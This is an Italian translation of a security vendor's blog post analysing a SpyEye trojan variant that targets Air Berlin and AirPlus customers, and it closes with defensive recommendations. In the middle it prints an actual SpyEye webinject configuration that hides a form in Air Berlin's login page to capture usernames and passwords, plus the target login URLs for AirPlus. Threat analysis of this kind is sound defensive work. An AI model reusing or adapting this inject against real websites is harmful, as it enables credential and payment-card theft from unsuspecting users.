Leonardo Musumeci

Il post seguente è stato tradotto per gentile concessione di Trusteer

Abbiamo scoperto una versione di SpyEye che colpisce gli utenti dei siti web di due compagnie aeree leader in Europa: Air Berlin, seconda compagnia aerea in Germania (dopo Lufthansa) e AirPlus, fornitore globale di servizi di business travel per le aziende. SpyEye usa la macchina dell’utente, non i siti, per effettuare questo tipo di frode.

I soggetti da attaccare sono ben lungi dall’essere scelti a caso ma, crediamo, siano accuratamente scelti per il loro potenziale di guadagno criminale. Un sito accetta pagamenti con carte di debito, mentre l’altro si rivolge agli utenti aziendali.

Air Berlin, la sesta compagnia aerea in Europa, non solo accetta carte di debito e di credito; ma permette ai cittadini austriaci, olandesi e tedeschi di pagare con addebito bancario diretto sette giorni prima della partenza.

Di conseguenza, i criminali che colpiscano un viaggiatore Air Berlin da questi paesi, hanno una buona probabilità di ottenere i dati personali degli utenti; tra cui la data di nascita, obbligatoria sul sito della compagnia aerea, così come i loro dati bancari.

Air Plus, invece, offre una varietà di servizi per le aziende di tutte le dimensioni tramite il loro sito, tutti pagati con carte di pagamento aziendali, immancabilmente connesse a conti bancari aziendali.

Visto che i conti aziendali tendono ad avere saldi (o limiti di credito) maggiori rispetto ai conti consumer, hanno un potenziale di guadagno cibercriminale maggiore per quanto riguarda la prospettiva della raccolta dati.

Nel caso dell’attacco di Air Berlin, SpyEye cerca di raccogliere informazioni riservate degli utenti, tra cui nomi utente e password e altri dati inseriti nella pagina web colpita. Dal momento che Air Berlin accetta pagamenti con carte di debito bancarie, il potenziale di frode è ancora maggiore.

Il codice dell’injection di SpyEye cattura le informazioni in merito ai dettagli di nomi utente e password:

<WebInjects action=”Inject|POST|GET”>
<Url><![CDATA[https://www.airberlin.com/site/yab/login/login*]]></Url>
<AuxUrl><![CDATA[]]></AuxUrl>
<WebInject>
<Before><![CDATA[<body>]]></Before>
<Data><![CDATA[<iframe name=ifr1 id=ifr1 src="https://www.airberlin.com/site/images/spacer.gif" width=0 height=0 border=none>
</iframe>
<form id=form7 name=form7 target=ifr1 method=post action="https://www.airberlin.com/site/images/spacer.gif">
<input type="hidden" name="cc" id="cc" />
<input type="hidden" name="pas" id="pas" />
</form>
<script>
function dosubmit(){
document.form7.cc.value=document.getElementById('login').value;
document.form7.pas.value=document.getElementById('pass').value;
document.form7.submit();
}
</script>]]></Data>
<After><![CDATA[]]></After>
</WebInject>
<WebInject>
<Before><![CDATA[name="yabLogin" id="yabLogin"]]></Before>
<Data><![CDATA[ onclick="dosubmit()"]]></Data>
<After><![CDATA[]]></After>
</WebInject>

La metodologia di attacco di AirPlus, invece, colpisce gli utenti della carta di credito Lufthansa Miles & More del circuito Visa che offre viaggi premio per gli acquisti effettuati con la carta.

Simile all’attacco di Air Berlin, il codice di SpyEye colpisce l’URL di login del portale AirPlus:

<Url><![CDATA[https://portal.airplus.com/welcome*]]></Url>
<Url><![CDATA[https://www.miles-and-more.kartenabrechnung.de/welcome*]]></Url>

In questo caso, SpyEye, inietta il codice nel browser degli utenti, sostenendo di essere un miglioramento anti-frode.

In realtà, naturalmente, è un tentativo abilmente dissimulato di effettuare il phishing delle credenziali dell’ignaro cliente del portale di AirPlus.

Queste credenziali sono molto complete: includono tipo e numero della carta, la data di scadenza, il codice CVV (banda della firma del titolare) e, come per l’attacco ad Air Berlin, la data di nascita dell’utente.

La sottrazione delle date di nascita dell’utente permette il furto d’identità e – come abbiamo osservato – la frode impersonando l’utente e utilizzando metodi di attacco tramite social engineering ( si fa riferimento a un blog recente?)

Conclusioni

È importante capire che, ormai, il crimine informatico è altamente organizzato, con specializzazione delle funzioni all’interno dei diversi membri della gerarchia criminale.

Ciò significa che le gang di darkware coding, creatrici di queste varianti di SpyEye, stanno scegliendo con cura i loro obiettivi per ottenere il massimo rendimento con il minimo sforzo.

Inoltre, aumentando il rendimento di ogni vittima, le possibilità di rivendere i dati vanno ben al di là dei semplici forum di carder visti in quest’ultimi anni.

Siamo convinti che la(le) gang di cibercriminali dietro a questi attacchi, stia(no), quasi certamente, utilizzando una metodologia semi-automatica di sviluppo del codice, che consenta (loro) di sviluppare versioni personalizzate del malware per scopi specifici.

Chiaramente il commercio turistico permette ai cibercriminali di accedere alle credenziali degli account utente e aziendali con saldi e limiti di credito più grandi del normale.

“La ciliegina sulla torta” di poter accedere anche ai dettagli del conto bancario di Air Berlin in Austria, Germania e Paesi Bassi, è indice di ingegno mirato.

Purtroppo, i tradizionali meccanismi di sicurezza antivirus non sono per niente in grado di proteggere gli utenti aziendali dall’infezione di SpyEye, in quanto utilizza un’individuazione mirata, unitamente a tecniche di evasione della rilevazione della firma per mettere piede all’interno dei computer.

Un’alternativa migliore per proteggere i servizi basati sul web, è quella di realizzare un accesso sicuro al web. Ad esempio, strumenti di sicurezza basati su browser che rendano la comunicazione sicura tra il computer e il sito web del servizio cloud del provider, possono impedire ai metodi di attacco più comuni, come l’iniezione di codice HTML e il keylogging, di catturare dati. Queste stesse tecnologie possono essere usate per proteggere altre applicazioni basate su browser, come VPN, CRM, i sistemi retail, finanziari e di collaborazione che possono essere sfruttati da malware per rubare le credenziali utente e violare il perimetro di sicurezza di un’impresa del tutto inosservati.

Attendiamo di vedere versioni ancor più specializzate di SpyEye a breve.

Fonte: SpyEye Trojan Targets Airline Website that Accepts Bank Debit Card